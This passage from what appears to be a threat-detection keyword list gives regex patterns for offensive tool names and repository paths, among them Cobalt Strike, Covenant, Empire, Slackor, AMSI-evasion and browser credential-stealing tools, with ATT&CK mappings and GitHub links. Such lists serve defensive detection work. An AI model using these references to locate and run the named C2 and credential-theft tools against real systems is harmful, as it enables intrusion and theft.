T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*Coalfire-Research*",".{0,1000}Coalfire\-Research.{0,1000}","offensive_tool_keyword","Github Username","Red team exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Coalfire-Research","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Coalfire-Research/Slackor*",".{0,1000}Coalfire\-Research\/Slackor.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*Coalfire-Research/Slackor*",".{0,1000}Coalfire\-Research\/Slackor.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*Cobalt Strike external C2*",".{0,1000}Cobalt\sStrike\sexternal\sC2.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*Cobalt Strike*",".{0,1000}Cobalt\sStrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*cobaltclip.cna*",".{0,1000}cobaltclip\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*cobaltclip.exe*",".{0,1000}cobaltclip\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*cobaltstrike *",".{0,1000}cobaltstrike\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cobaltstrike*",".{0,1000}cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","cobaltstrike binary for windows - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network. While penetration tests focus on unpatched vulnerabilities and misconfigurations. these assessments benefit security operations and incident response.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cobaltstrike-*",".{0,1000}cobaltstrike\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cobalt-strike*",".{0,1000}cobalt\-strike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*-cobaltstrike*",".{0,1000}\-cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cobaltstrike.*",".{0,1000}cobaltstrike\..{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cobaltstrike.store*",".{0,1000}cobaltstrike\.store.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*cobaltstrike/*",".{0,1000}cobaltstrike\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Cobalt-Strike/bof_template*",".{0,1000}Cobalt\-Strike\/bof_template.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","1","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*cobaltstrike_*",".{0,1000}cobaltstrike_.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cobaltstrike-dist.tgz*",".{0,1000}cobaltstrike\-dist\.tgz.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*cobaltstrike-nemesis-connector*",".{0,1000}cobaltstrike\-nemesis\-connector.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*cobbr/Covenant*",".{0,1000}cobbr\/Covenant.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*cobbr/Elite*",".{0,1000}cobbr\/Elite.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*cobbr/PSAmsi*",".{0,1000}cobbr\/PSAmsi.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*cobbr/SharpSploit*",".{0,1000}cobbr\/SharpSploit.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*code_execution/*.dll*",".{0,1000}code_execution\/.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","empire","Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1075","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*code_execution/*.exe*",".{0,1000}code_execution\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","empire","Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1135","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*code_execution/*.ps1*",".{0,1000}code_execution\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1136","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Coded by LimerBoy <3*",".{0,1000}Coded\sby\sLimerBoy\s\<3.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*CodeExec-D37DA402-3829-492F-90D0-8EC3909514EB.json*",".{0,1000}CodeExec\-D37DA402\-3829\-492F\-90D0\-8EC3909514EB\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" 